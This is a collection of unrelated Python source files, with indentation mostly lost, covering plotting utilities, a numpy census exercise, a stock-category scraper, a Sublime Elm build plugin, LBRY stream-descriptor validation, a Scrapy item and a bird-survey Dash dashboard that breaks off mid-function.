rcParams['font.sans-serif'] = ['Ubuntu']
def word_cloud(corpus):
text = ""
for document, _ in corpus:
text += " ".join(document)
# Circle mask
x, y = np.ogrid[:300, :300]
mask = (x - 150) ** 2 + (y - 150) ** 2 > 130 ** 2
mask = 255 * mask.astype(int)
return WordCloud(scale=10,
mask=mask,
colormap=cmap,
background_color='white',
min_font_size=8).generate(text)
def scatter_plot_2d(x, labels):
fig, ax = plt.subplots()
fig.set_size_inches(12, 7)
df = pd.DataFrame(x, columns=['x', 'y'])
df['label'] = labels
for idx, label in enumerate(set(labels)):
ax.scatter(df[df['label'] == label]["x"],
df[df['label'] == label]["y"],
label=label,
s=30, lw=0, alpha=0.7)
ax.legend()
return fig, ax
def scatter_plot_3d(x, labels):
fig, ax = plt.subplots(subplot_kw={"projection": '3d'})
fig.set_size_inches(12, 7)
df = pd.DataFrame(x, columns=['x', 'y', 'z'])
df['label'] = labels
for idx, label in enumerate(set(labels)):
ax.scatter(
xs=df[df['label'] == label]["x"],
ys=df[df['label'] == label]["y"],
zs=df[df['label'] == label]["z"],
label=label,
)
ax.legend()
return fig, ax
def scatter_plot(x, labels, dimension):
if dimension == 2:
return scatter_plot_2d(x, labels)
if dimension == 3:
return scatter_plot_3d(x, labels)
def umap_word_visualize(docs, labels, dimension):
reducer = umap.UMAP(random_state=42, n_components=dimension)
X = reducer.fit_transform(docs)
return scatter_plot(X, labels, dimension)
def t_sne_word_visualize(docs, labels, dimension):
reducer = TSNE(random_state=42, n_components=dimension,
perplexity=40, n_iter=400)
X = reducer.fit_transform(docs)
return scatter_plot(X, labels, dimension)
def pca_word_visualizer(docs, labels, dimension):
reducer = PCA(n_components=dimension)
X = reducer.fit_transform(docs.toarray())
return scatter_plot(X, labels, dimension)
def kmeans_visualizer(docs, docs_labels, docs_clusters, centers, title):
fig, ax = plt.subplots()
fig.set_size_inches(12, 7)
reducer = PCA(n_components=2)
X = reducer.fit_transform(docs.toarray())
centroids = reducer.transform(centers)
df = pd.DataFrame(X, columns=['x', 'y'])
df['label'] = docs_labels
for idx, cluster in enumerate(docs_clusters):
ax.plot(
[centroids[cluster, 0], X[idx, 0]], [
centroids[cluster, 1], X[idx, 1]],
linestyle='-', color="#444444", linewidth=1, alpha=0.2, zorder=2)
for idx, label in enumerate(set(docs_labels)):
values = df[df['label'] == label]
ax.scatter(values["x"], values["y"], marker=".", label=label, zorder=1)
ax.scatter(centroids[:, 0], centroids[:, 1],
marker='o', c="w", alpha=1, s=200, zorder=3)
for idx in range(len(centroids)):
ax.scatter(centroids[idx, 0], centroids[idx, 1], color="k",
marker="$%d$" % idx, zorder=4)
ax.legend()
ax.set_title(title)
return fig, ax
def silhouette_plot(y, n_clusters, silhouette_avg, sample_silhouette_values, ax):
y_lower = 10
ax.set_ylim([0, len(y) + (n_clusters + 1) * 10])
ax.set_xlim([-0.1, 1])
for cluster in range(n_clusters):
ith_cluster_silhouette_values = sample_silhouette_values[y == cluster]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = cmap(float(cluster) / n_clusters)
ax.fill_betweenx(
np.arange(y_lower, y_upper), 0,
ith_cluster_silhouette_values,
facecolor=color,
edgecolor=color,
alpha=0.7)
ax.text(-0.15, y_lower + 0.5 * size_cluster_i, str(cluster))
y_lower = y_upper + 10
ax.axvline(x=silhouette_avg, color="red", linestyle="-", alpha=0.8)
ax.set_yticks([])
return ax
def cluster_plot(x, y, centers, ax=None):
colors = cmap(y.astype(float) / len(centers))
ax.scatter(x[:, 0], x[:, 1], marker='.', s=30,
lw=0, alpha=0.7, c=colors, edgecolor='k')
ax.scatter(centers[:, 0], centers[:, 1],
marker='D', c="w", alpha=1, s=200)
for i, c in enumerate(centers):
ax.scatter(c[0], c[1], marker='$%d$' %
i, alpha=1, s=50, edgecolor='k')
return ax
def cluster_docs_plot(docs, y, centers):
reducer = PCA(n_components=2)
X = reducer.fit_transform(docs.toarray())
centroids = reducer.transform(centers)
fig, ax = plt.subplots()
fig.set_size_inches(12, 7)
ax = cluster_plot(X, y, centroids, ax)
return fig, ax
def silhouette_cluster_plot(docs, y, centers, n_clusters, silhouette_avg, sample_silhouette_values):
reducer = PCA(n_components=2)
X = reducer.fit_transform(docs.toarray())
centroids = reducer.transform(centers)
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_size_inches(15, 10)
silhouette_plot(y, n_clusters, silhouette_avg,
sample_silhouette_values, ax1)
cluster_plot(X, y, centroids, ax2)
return fig, (ax1, ax2)
def satter_graph_metrics(points, clusters, title, color=1, contrast=[], y_label="", x_label=""):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
ax.plot(clusters, points, linestyle="-",
color=cmap(color), marker="o", zorder=1)
if len(contrast) > 0:
ax.scatter([clusters[i] for i in contrast], [points[i]
for i in contrast], marker="o", color="r", s=120, zorder=2)
        for i in contrast:
            ax.axvline(x=clusters[i], color="r",
                       linestyle="-", alpha=0.8, zorder=3)
ax.set_title(title)
ax.set_xticks(clusters)
ax.set_ylabel(y_label)
ax.set_xlabel(x_label)
return fig, ax
def plot_dendrogram(model, y):
fig, (ax1, ax2) = plt.subplots(
nrows=2, ncols=1, sharex=False, sharey=False,
gridspec_kw={'height_ratios': [5, 1], 'hspace': 0.002})
fig.set_size_inches(25, 10)
counts = np.zeros(model.children_.shape[0])
n_samples = len(model.labels_)
for i, merge in enumerate(model.children_):
current_count = 0
for child_idx in merge:
if child_idx < n_samples:
current_count += 1 # leaf node
else:
current_count += counts[child_idx - n_samples]
counts[i] = current_count
linkage_matrix = np.column_stack(
[model.children_, model.distances_, counts]).astype(float)
colormap = {label: cmap(idx / len(set(y)))
for idx, label in enumerate(set(y))}
ddata = dendrogram(linkage_matrix, labels=y, no_labels=True, ax=ax1)
colors = [colormap[label] for label in ddata['ivl']]
ax2.bar([idx for idx, _ in enumerate(y)], [
1 for _ in range(len(y))], color=colors, edgecolor=colors)
ax2.set_xlim(-0.5, len(y)-.5)
ax2.set_yticks([])
ax2.set_xticks([])
ax2.legend(handles=[mpatches.Patch(color=b, label=a) for a, b in colormap.items()],
bbox_to_anchor=(0.5, -0.5), loc='lower center', ncol=len(colormap.values()))
return fig, (ax1, ax2)
def plot_confusion_matrix(cm, y_true, title):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
df_cm = pd.DataFrame(cm, columns=np.unique(
y_true), index=np.unique(y_true))
df_cm.index.name = 'Real'
df_cm.columns.name = 'Previsto'
sns.heatmap(df_cm, cmap=cmap, annot=True, ax=ax)
ax.tick_params(labelrotation=0)
ax.set_title(title)
return fig, ax
def plot_compare_bar(y1, y2, labels, title="", ylabel="Polaridade"):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
x = np.arange(len(labels))
width = 0.35
category_colors = cmap(np.linspace(0.15, 0.85, 2 ))
rects1 = ax.bar(x - width/2, y1[1], width, label=y1[0], color=category_colors[0])
rects2 = ax.bar(x + width/2, y2[1], width, label=y2[0], color=category_colors[1])
ax.set_ylabel(ylabel)
ax.set_title(title)
ax.set_xticks(x)
ax.set_xticklabels(labels)
ax.legend()
def autolabel(rects):
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
autolabel(rects2)
return fig, ax
def compare_survey(results, category_names, title):
labels = list(results.keys())
data = np.array(list(results.values()))
data_cum = data.cumsum(axis=1)
category_colors = cmap(np.linspace(0.15, 0.85, data.shape[1]))
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
ax.invert_yaxis()
ax.xaxis.set_visible(False)
ax.set_xlim(0, np.sum(data, axis=1).max())
for i, (colname, color) in enumerate(zip(category_names, category_colors)):
widths = data[:, i]
starts = data_cum[:, i] - widths
ax.barh(labels, widths, left=starts, height=0.5,
label=colname, color=color, linewidth=0)
xcenters = starts + widths / 2
r, g, b, _ = color
text_color = 'white' if r * g * b < 0.5 else 'darkgrey'
for y, (x, c) in enumerate(zip(xcenters, widths)):
ax.text(x, y, str(int(c)), ha='center', va='center',
color=text_color)
ax.legend(ncol=len(category_names), bbox_to_anchor=(0, 1),
loc='lower left', fontsize='small')
ax.set_title(title)
return fig, ax
def coeherence_score(range_start, range_end, step, coherence_scores, title):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
x_ax = range(range_start, range_end, step)
y_ax = coherence_scores
ax.plot(x_ax, y_ax, c='r')
ax.axhline(y=sum(coherence_scores)/len(coherence_scores),
c='k', linestyle='--', linewidth=2)
ax.set_xlabel('Numero de topicos')
ax.set_ylabel('Coerência')
ax.set_title(title)
return fig, ax
def reduce_dimensions_word2vec(model):
num_dimensions = 2 # final num dimensions (2D, 3D, etc)
# extract the words & their vectors, as numpy arrays
vectors = np.asarray(model.wv.vectors)
labels = np.asarray(model.wv.index_to_key) # fixed-width numpy strings
# reduce using t-SNE
tsne = TSNE(n_components=num_dimensions, random_state=0)
vectors = tsne.fit_transform(vectors)
x_vals = [v[0] for v in vectors]
y_vals = [v[1] for v in vectors]
return x_vals, y_vals, labels
def plot_word2vec_with_matplotlib(x_vals, y_vals, labels, title):
random.seed(0)
fig, ax = plt.subplots()
fig.set_size_inches(12, 12)
ax.scatter(x_vals, y_vals)
indices = list(range(len(labels)))
selected_indices = random.sample(indices, 25)
for i in selected_indices:
ax.annotate(labels[i], (x_vals[i], y_vals[i]))
ax.set_title(title)
return fig, ax
|
python
|
# --------------
# Importing header files
import numpy as np
# Path of the file has been stored in variable called 'path'
#data_file='file.csv' # path for the file
data=np.genfromtxt(path, delimiter=",", skip_header=1)
#print("\nData: \n\n", data)
#print("\nType of data: \n\n", type(data))
#New record
new_record=[[50, 9, 4, 1, 0, 0, 40, 0]]
census=np.concatenate((data,new_record))
#Code starts here
# --------------
#Code starts here
age=census[:,0]
max_age=age.max()
min_age=age.min()
age_mean=np.mean(age)
age_std=np.std(age)
print(age,min_age,max_age,age_mean,age_std)
# --------------
#Code starts here
race_0=census[census[:,2]==0]
race_1=census[census[:,2]==1]
race_2=census[census[:,2]==2]
race_3=census[census[:,2]==3]
race_4=census[census[:,2]==4]
l=[]
len_0=len(race_0)
len_1=len(race_1)
len_2=len(race_2)
len_3=len(race_3)
len_4=len(race_4)
l.append(len_0)
l.append(len_1)
l.append(len_2)
l.append(len_3)
l.append(len_4)
#print(l)
minority_race=l.index(min(l))
print(minority_race)
# --------------
#Code starts here
senior_citizens=census[census[:,0]>60]
working_hours_sum=np.sum(senior_citizens[:,6],axis=0)
senior_citizens_len=len(senior_citizens)
avg_working_hours=working_hours_sum/senior_citizens_len
print(avg_working_hours)
# --------------
#Code starts here
high=census[census[:,1]>10]
low=census[census[:,1]<=10]
avg_pay_high=round(high[:,7].mean(axis=0),2)
avg_pay_low=round(low[:,7].mean(axis=0),2)
print(avg_pay_high,avg_pay_low)
|
python
|
# -*- coding: utf-8 -*-
import pandas as pd
import requests
from zvdata.api import df_to_db
from zvdata.recorder import Recorder
from zvt.api.common import china_stock_code_to_id
from zvt.api.quote import get_entities
from zvt.domain import StockIndex, StockCategory
from zvt.domain.stock_meta import Index
from zvdata.utils.utils import json_callback_param
class ChinaStockCategoryRecorder(Recorder):
provider = 'eastmoney'
data_schema = StockIndex
    # URLs used to fetch the industry / concept / region category lists
category_map_url = {
StockCategory.industry: 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C._BKHY&sty=DCRRBKCPAL&st=(ChangePercent)&sr=-1&p=1&ps=200&lvl=&cb=jsonp_F1A61014DE5E45B7A50068EA290BC918&token=4f1862fc3b5e77c150a2b985b12db0fd&_=08766',
StockCategory.concept: 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C._BKGN&sty=DCRRBKCPAL&st=(ChangePercent)&sr=-1&p=1&ps=300&lvl=&cb=jsonp_3071689CC1E6486A80027D69E8B33F26&token=4f1862fc3b5e77c150a2b985b12db0fd&_=08251',
StockCategory.area: 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C._BKDY&sty=DCRRBKCPAL&st=(ChangePercent)&sr=-1&p=1&ps=200&lvl=&cb=jsonp_A597D4867B3D4659A203AADE5B3B3AD5&token=4f1862fc3b5e77c150a2b985b12db0fd&_=02443'
}
    # URL used to fetch the stocks that belong to a category
category_stocks_url = 'https://nufm.dfcfw.com/EM_Finance2014NumericApplication/JS.aspx?type=CT&cmd=C.{}{}&sty=SFCOO&st=(Close)&sr=-1&p=1&ps=300&cb=jsonp_B66B5BAA1C1B47B5BB9778045845B947&token=7bc05d0d4c3c22ef9fca8c2a912d779c'
def __init__(self, batch_size=10, force_update=False, sleeping_time=10) -> None:
super().__init__(batch_size, force_update, sleeping_time)
self.indices = get_entities(session=self.session, entity_type='index', exchanges=['cn'],
return_type='domain', provider=self.provider)
self.index_ids = [index_item.id for index_item in self.indices]
def run(self):
for category, url in self.category_map_url.items():
resp = requests.get(url)
results = json_callback_param(resp.text)
for result in results:
items = result.split(',')
code = items[1]
name = items[2]
id = 'index_cn_{}'.format(code)
if id in self.index_ids:
continue
self.session.add(Index(id=id, entity_id=id, entity_type='index', exchange='cn', code=code, name=name,
category=category.value))
self.session.commit()
indices = get_entities(session=self.session, entity_type='index',
return_type='domain', filters=[
Index.category.in_(
[StockCategory.concept.value, StockCategory.industry.value])],
provider=self.provider)
for index_item in indices:
resp = requests.get(self.category_stocks_url.format(index_item.code, '1'))
try:
results = json_callback_param(resp.text)
the_list = []
for result in results:
items = result.split(',')
stock_code = items[1]
stock_id = china_stock_code_to_id(stock_code)
index_id = index_item.id
the_list.append({
'id': '{}_{}'.format(index_id, stock_id),
'index_id': index_id,
'stock_id': stock_id
})
if the_list:
df = pd.DataFrame.from_records(the_list)
df_to_db(data_schema=self.data_schema, df=df, provider=self.provider)
self.logger.info('finish recording index:{},{}'.format(index_item.category, index_item.name))
except Exception as e:
                self.logger.error("error: %s, resp.text: %s", e, resp.text)
self.sleep()
if __name__ == '__main__':
# init_process_log('china_stock_category.log')
recorder = ChinaStockCategoryRecorder()
recorder.run()
|
python
|
import json
import re
import string
try: # ST3
from .elm_plugin import *
from .elm_project import ElmProject
except: # ST2
from elm_plugin import *
from elm_project import ElmProject
default_exec = import_module('Default.exec')
@replace_base_class('Highlight Build Errors.HighlightBuildErrors.ExecCommand')
class ElmMakeCommand(default_exec.ExecCommand):
# inspired by: http://www.sublimetext.com/forum/viewtopic.php?t=12028
def run(self, error_format, info_format, syntax, color_scheme, null_device, warnings, **kwargs):
self.buffer = b''
self.warnings = warnings == "true"
self.error_format = string.Template(error_format)
self.info_format = string.Template(info_format)
self.run_with_project(null_device=null_device, **kwargs)
self.style_output(syntax, color_scheme)
def run_with_project(self, cmd, working_dir, null_device, **kwargs):
file_arg, output_arg = cmd[1:3]
project = ElmProject(file_arg)
log_string('project.logging.settings', repr(project))
if '{output}' in output_arg:
cmd[1] = fs.expanduser(project.main_path)
output_path = fs.expanduser(project.output_path)
cmd[2] = output_arg.format(output=output_path)
else:
# cmd[1] builds active file rather than project main
cmd[2] = output_arg.format(null=null_device)
project_dir = project.working_dir or working_dir
# ST2: TypeError: __init__() got an unexpected keyword argument 'syntax'
super(ElmMakeCommand, self).run(cmd, working_dir=project_dir, **kwargs)
def style_output(self, syntax, color_scheme):
self.output_view.set_syntax_file(syntax)
self.output_view.settings().set('color_scheme', color_scheme)
if self.is_patched:
self.debug_text = ''
else:
self.debug_text = get_string('make.missing_plugin')
def on_data(self, proc, data):
self.buffer += data
def on_finished(self, proc):
result_strs = self.buffer.decode(self.encoding).split('\n')
flat_map = lambda f ,xss: sum(map(f, xss), [])
output_strs = flat_map(self.format_result, result_strs) + ['']
output_data = '\n'.join(output_strs).encode(self.encoding)
super(ElmMakeCommand, self).on_data(proc, output_data)
super(ElmMakeCommand, self).on_finished(proc)
def format_result(self, result_str):
decode_error = lambda dict: self.format_error(**dict) if 'type' in dict else dict
try:
data = json.loads(result_str, object_hook=decode_error)
return [s for s in data if s is not None]
except ValueError:
log_string('make.logging.invalid_json', result_str)
info_str = result_str.strip()
return [self.info_format.substitute(info=info_str)] if info_str else []
def format_error(shelf, type, file, region, tag, overview, details, **kwargs):
if type == 'warning' and not shelf.warnings:
return None
line = region['start']['line']
column = region['start']['column']
message = overview
if details:
message += '\n' + re.sub(r'(\n)+', r'\1', details)
# TypeError: substitute() got multiple values for argument 'self'
# https://bugs.python.org/issue23671
return shelf.error_format.substitute(**locals())
|
python
|
import numpy as np
import matplotlib.pyplot as plt
def get_steps_colors(values):
values = 1 / values
_range = np.max(values) - np.min(values)
_values = (values - np.min(values)) / _range
colors_data = plt.cm.Wistia(_values)
return colors_data
def paint_table(df, title_cols, title_text, result_path, fontsize=-1, fig_background_color='white', fig_border='white'):
df = df.copy()
df = df.applymap(lambda x: x[:15] + '...' if isinstance(x, str) and len(x) > 15 else x)
# Get headers
footer_text = ''
cols_header = df.columns
cols_header_data = df.columns[1:]
if title_cols != None:
cols_header_data = df.columns[len(title_cols):]
df_data = df[cols_header_data]
# Get data
cell_text = []
for i, row in df.iterrows():
data_row = list(row.values[0:len(title_cols)]) + [f'{x:1.3f}' for x in row.values[len(title_cols):]]
cell_text.append(data_row)
# Get colors
colors_cells = []
for i, row in df_data.iterrows():
colors_data = get_steps_colors(row.values)
colors_row = np.append(plt.cm.binary(np.full(len(title_cols), 1)), colors_data, axis=0)
colors_cells.append(colors_row)
colors_header = plt.cm.binary(np.full(len(cols_header), 1))
# Figure
plt.figure(linewidth=2,
edgecolor=fig_border,
facecolor=fig_background_color,
tight_layout={'pad': 1},
# figsize=(5,3)
)
# plt.rcParams.update({"font.size": 20})
the_table = plt.table(cellText=cell_text,
cellColours=colors_cells,
rowLoc='right',
colColours=colors_header,
colLabels=cols_header,
loc='center')
# Set font size if user set it
if fontsize > 0:
the_table.auto_set_font_size(False)
the_table.set_fontsize(fontsize)
the_table.scale(1, 1.5)
# Hide axes
ax = plt.gca()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Hide axes border
plt.box(on=None)
# Add title
cell_height = the_table[0, 0].get_height()
center = 0.5
distance_cell_title = 0.02
y = center + cell_height * (df.shape[0] + 1) / 2 + distance_cell_title
plt.suptitle(title_text, y=y)
# Add footer
plt.figtext(0.95, 0.05, footer_text, horizontalalignment='right', size=6, weight='light')
# Force the figure to update, so backends center objects correctly within the figure.
# Without plt.draw() here, the title will center on the axes and not the figure.
plt.draw()
# Create image. plt.savefig ignores figure edge and face colors, so map them.
fig = plt.gcf()
plt.savefig(result_path,
# bbox='tight',
edgecolor=fig.get_edgecolor(),
facecolor=fig.get_facecolor(),
dpi=400
)
|
python
|
import binascii
import logging
from lbrynet.core.cryptoutils import get_lbry_hash_obj, verify_signature
from twisted.internet import defer, threads
from lbrynet.core.Error import DuplicateStreamHashError, InvalidStreamDescriptorError
from lbrynet.lbrylive.LiveBlob import LiveBlobInfo
from lbrynet.interfaces import IStreamDescriptorValidator
from zope.interface import implements
log = logging.getLogger(__name__)
LiveStreamType = "lbrylive"
def save_sd_info(stream_info_manager, sd_info, ignore_duplicate=False):
log.debug("Saving info for %s", str(sd_info['stream_name']))
hex_stream_name = sd_info['stream_name']
public_key = sd_info['public_key']
key = sd_info['key']
stream_hash = sd_info['stream_hash']
raw_blobs = sd_info['blobs']
crypt_blobs = []
for blob in raw_blobs:
length = blob['length']
if length != 0:
blob_hash = blob['blob_hash']
else:
blob_hash = None
blob_num = blob['blob_num']
revision = blob['revision']
iv = blob['iv']
signature = blob['signature']
crypt_blobs.append(LiveBlobInfo(blob_hash, blob_num, length, iv, revision, signature))
log.debug("Trying to save stream info for %s", str(hex_stream_name))
d = stream_info_manager.save_stream(stream_hash, public_key, hex_stream_name,
key, crypt_blobs)
def check_if_duplicate(err):
if ignore_duplicate is True:
err.trap(DuplicateStreamHashError)
d.addErrback(check_if_duplicate)
d.addCallback(lambda _: stream_hash)
return d
def get_sd_info(stream_info_manager, stream_hash, include_blobs):
d = stream_info_manager.get_stream_info(stream_hash)
def format_info(stream_info):
fields = {}
fields['stream_type'] = LiveStreamType
fields['stream_name'] = stream_info[2]
fields['public_key'] = stream_info[0]
fields['key'] = stream_info[1]
fields['stream_hash'] = stream_hash
def format_blobs(blobs):
formatted_blobs = []
for blob_hash, blob_num, revision, iv, length, signature in blobs:
blob = {}
if length != 0:
blob['blob_hash'] = blob_hash
blob['blob_num'] = blob_num
blob['revision'] = revision
blob['iv'] = iv
blob['length'] = length
blob['signature'] = signature
formatted_blobs.append(blob)
fields['blobs'] = formatted_blobs
return fields
if include_blobs is True:
d = stream_info_manager.get_blobs_for_stream(stream_hash)
else:
d = defer.succeed([])
d.addCallback(format_blobs)
return d
d.addCallback(format_info)
return d
class LBRYLiveStreamDescriptorValidator(object):
implements(IStreamDescriptorValidator)
def __init__(self, raw_info):
self.raw_info = raw_info
def validate(self):
log.debug("Trying to validate stream descriptor for %s", str(self.raw_info['stream_name']))
hex_stream_name = self.raw_info['stream_name']
public_key = self.raw_info['public_key']
key = self.raw_info['key']
stream_hash = self.raw_info['stream_hash']
h = get_lbry_hash_obj()
h.update(hex_stream_name)
h.update(public_key)
h.update(key)
if h.hexdigest() != stream_hash:
raise InvalidStreamDescriptorError("Stream hash does not match stream metadata")
blobs = self.raw_info['blobs']
def check_blob_signatures():
for blob in blobs:
length = blob['length']
if length != 0:
blob_hash = blob['blob_hash']
else:
blob_hash = None
blob_num = blob['blob_num']
revision = blob['revision']
iv = blob['iv']
signature = blob['signature']
hashsum = get_lbry_hash_obj()
hashsum.update(stream_hash)
if length != 0:
hashsum.update(blob_hash)
hashsum.update(str(blob_num))
hashsum.update(str(revision))
hashsum.update(iv)
hashsum.update(str(length))
if not verify_signature(hashsum.digest(), signature, public_key):
raise InvalidStreamDescriptorError("Invalid signature in stream descriptor")
return threads.deferToThread(check_blob_signatures)
def info_to_show(self):
info = []
info.append(("stream_name", binascii.unhexlify(self.raw_info.get("stream_name"))))
return info
def get_length_of_stream(self):
return None
|
python
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JdZhilianItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
companyname = scrapy.Field()
joblink = scrapy.Field()
salary = scrapy.Field()
workplace = scrapy.Field()
updatetime = scrapy.Field()
jobtype = scrapy.Field()
workexperience = scrapy.Field()
education = scrapy.Field()
recrunumbers = scrapy.Field()
jobcategory = scrapy.Field()
jobdetails = scrapy.Field()
crawltime = scrapy.Field()
companyinfo = scrapy.Field()
|
python
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from django_plotly_dash import DjangoDash
import dash_table
import dash_bootstrap_components as dbc
import plotly.graph_objs as go
import plotly.express as px
import random
import json
import pandas as pd
import numpy as np
import datetime
import names
import re
from fall.models import SurveyObs, Survey
import eb_passwords
from collections import Counter
'''
for the team dashboard
the URL pathname is used to decide which team's contents to show
'''
DEMO_MODE = True
app = DjangoDash(
'OneTeam',
add_bootstrap_links=True,
) # replaces dash.Dash
teams = ['彩鷸隊', '家燕隊', '大冠鷲隊']
'''
team = 0, 1, 2
'''
def team_thumbnail_content(team):
if team == 2:
return html.Div([
html.Img(src='/static/img/fall/forestbird.png', className='px-3'),
html.H4('大冠鷲隊成績', className='text-center pt-3')
])
if team == 1:
return html.Div([
html.Img(src='/static/img/fall/citybird.png', className='px-3'),
html.H4('家燕隊成績', className='text-center pt-3')
])
return html.Div([
html.Img(src='/static/img/fall/farmbird.png', className='px-3'),
html.H4('彩鷸隊成績', className='text-center pt-3')
])
def team_datatable(team, w):
text_size = '1vw'
table_height = '30vh'
if w < 768:
text_size = '4vw'
table_height = '40vh'
if datetime.date.today() < datetime.date(2020,10,1):
records = SurveyObs.objects.filter(survey__team = '黑面琵鷺隊', survey__is_valid=True).values('survey__checklist_id','species_name', 'amount')
else:
records = SurveyObs.objects.filter(survey__team = teams[team], survey__is_valid=True).values('survey__checklist_id','species_name', 'amount')
df = pd.DataFrame.from_records(records)
if len(df) == 0:
odf = pd.DataFrame({})
else:
NameValidTable = pd.read_csv('../helper_files/NameValid.csv').fillna('缺值')
CNAME = NameValidTable.CNAME.tolist()
ENAME = NameValidTable.ENAME.tolist()
re_spe = []
for s in df.species_name:
ns = re.sub(r' ?\(.*?\)','',s)
if s[0].isupper():
if s in ENAME:
re_spe.append(CNAME[ENAME.index(s)])
elif ns in ENAME:
re_spe.append(CNAME[ENAME.index(ns)])
else:
re_spe.append('not valid')
else:
if s in CNAME:
re_spe.append(s)
elif ns in CNAME:
re_spe.append(ns)
else:
re_spe.append('not valid')
df['ValidSpecies'] = re_spe
spe = list(set(re_spe))
counts = []
samples = []
tname = []
for s in spe:
if s == 'not valid': continue
counts.append(sum(df[df.ValidSpecies==s].amount))
samples.append(len(df[df.ValidSpecies==s]))
tname.append(s)
odf = pd.DataFrame(dict(物種=tname,總數量=counts,清單數=samples))
NTD = []
TO = NameValidTable.TAXON_ORDER
for n in tname:
NTD.append(TO[CNAME.index(n)])
odf['TO'] = NTD
odf.sort_values(by=['TO'],inplace=True)
odf = odf[['物種','總數量','清單數']].reset_index(drop=True)
final_table = dash_table.DataTable(
data = odf.to_dict('records'),
columns=[{'id': c, 'name': c} for c in odf.columns],
fixed_rows={ 'headers': True, 'data': 0 },
style_as_list_view=True,
filter_action='native',
sort_action='native',
page_action='none',
style_cell={'minWidth': '30px','width': '30px','maxWidth': '30px','font-size':text_size,'textAlign':'center'},
style_header={'background':'rgb(114 157 84)','color':'#fff','font-weight':'600','border':'1px solid #000','border-radius': '2vh 2vh 0 0'},
style_data={'whiteSpace': 'normal','height': 'auto'},
style_table={'height': table_height,'maxHeight':'70vh'},
)
return final_table
# lightweight placeholder so the complex map is not set up twice
def empty_map():
fig = go.Figure(go.Scattermapbox(lat=['38.91427',],lon=['-77.02827',]))
fig.update_layout(
mapbox=dict(
center=dict(lat=23.973793,lon=120.979703),
zoom=8,
style='white-bg')
)
return fig
def team_map(team, w):
zoom = 9
if w < 768: zoom = 8
with open('../helper_files/TaiwanCounties_simple.geojson') as f:
geoj = json.load(f)
data = pd.DataFrame()
NorthTaiwan_geo = []
for f in geoj['features']:
if f['properties']['COUNTYNAME'] in ['新北市', '臺北市']:
NorthTaiwan_geo.append(f)
geoj['features'] = NorthTaiwan_geo
RN = []
for k in range(len(geoj['features'])):
temp = geoj['features'][k]['properties']['COUNTYNAME']+geoj['features'][k]['properties']['TOWNNAME']
geoj['features'][k]['id'] = temp
RN.append(temp)
# and insert id to df
data['Name'] = RN
'''
    prepare the map data: the number of valid checklists this team has uploaded in each town
'''
if datetime.date.today() < datetime.date(2020, 10, 1):
data['NC'] = np.random.randint(0, 40, len(data))
else:
towns = Survey.objects.filter(team=teams[team], is_valid=True).values_list('county',flat=True)
if len(towns) == 0: return empty_map()
county_counts = Counter(towns)
nc = [0] * len(RN)
for t in county_counts:
nc[RN.index(t)] = county_counts[t]
data['NC'] = nc
area_map = px.choropleth_mapbox(data, geojson=geoj, color="NC",
locations="Name",center={"lat": 24.9839, "lon":121.65},
mapbox_style="carto-positron", zoom=zoom, hover_data=['NC'],
color_continuous_scale="Greens",
)
area_map.update_traces(
hovertemplate='%{location} 已上傳%{customdata}筆清單!<extra></extra>',
hoverlabel=dict(font=dict(size=16)),
# showlegend=False,
marker=dict(line=dict(width=1,color='#000')),
)
area_map.update_layout(
mapbox = dict(
accesstoken=eb_passwords.map_box_api_key,
),
margin={"r":0,"t":0,"l":0,"b":0},
coloraxis=dict(
colorbar = dict(
title='上傳清單數',
thicknessmode='fraction',
thickness = 0.02,
yanchor="top",
y=0.99,
xanchor="left",
x=0.01,
bgcolor='rgba(0,0,0,0)')),
        # known issue: dragmode=False should disable dragging here, but it does not seem to take effect
)
return area_map
def draw_bar(values, names, w):
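    # horizontal top-5 ranking chart: `values`/`names` arrive sorted from highest
    # to lowest and are reversed so rank 1 is drawn at the top; long names are
    # truncated below depending on the viewport width `w`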
values = values[::-1]
names = names[::-1]
    # handle the case where there is no data yet, e.g. the challenge has just begun and nothing has been scraped
empty_plot = False
if len(values) == 0:
empty_plot = True
values= [0] * 5
names = [''] * 5
else:
try:
if len(values) < 5:
t = [0] * (5 - len(values))
values = t + values
t = [' '] * (5 - len(names))
names = t + names
except:
empty_plot = True
values= [0] * 5
names = [''] * 5
m_names = []
if w < 768:
for n in names:
c_ord = sum([ord(c) for c in n])
if (c_ord > 40000 and len(n)> 6) or (len(n) > 15):
if c_ord > 40000:
m_names.append(n[:6]+'...')
else:
m_names.append(n[:12]+'...')
else:
m_names.append(n)
else:
for n in names:
c_ord = sum([ord(c) for c in n])
if (c_ord > 60000 and len(n)> 12) or (len(n) > 30):
if c_ord > 40000:
m_names.append(n[:12]+'...')
else:
m_names.append(n[:30]+'...')
else:
m_names.append(n)
data = [go.Bar(x = values,
y = [1,2,3,4,5],
width=[0.5, 0.5, 0.5, 0.5, 0.5],
marker_color='#5EA232',
orientation='h',
hoverinfo = 'text',
hovertext = [f'{n}: {v}' for n,v in zip(names, values)]),
go.Scatter(x = [max(values) * -0.75] * 5,
y = [1,2,3,4,5],
               text=[f'<b>{n}</b>' for n in m_names],  # show the (possibly truncated) names as bold labels
mode = 'text',
textposition="middle right",
textfont=dict(color="black",
family='Noto Sans TC',
size=12,),
hoverinfo='none'),
]
    # value labels drawn in white inside the bars (only when there is data)
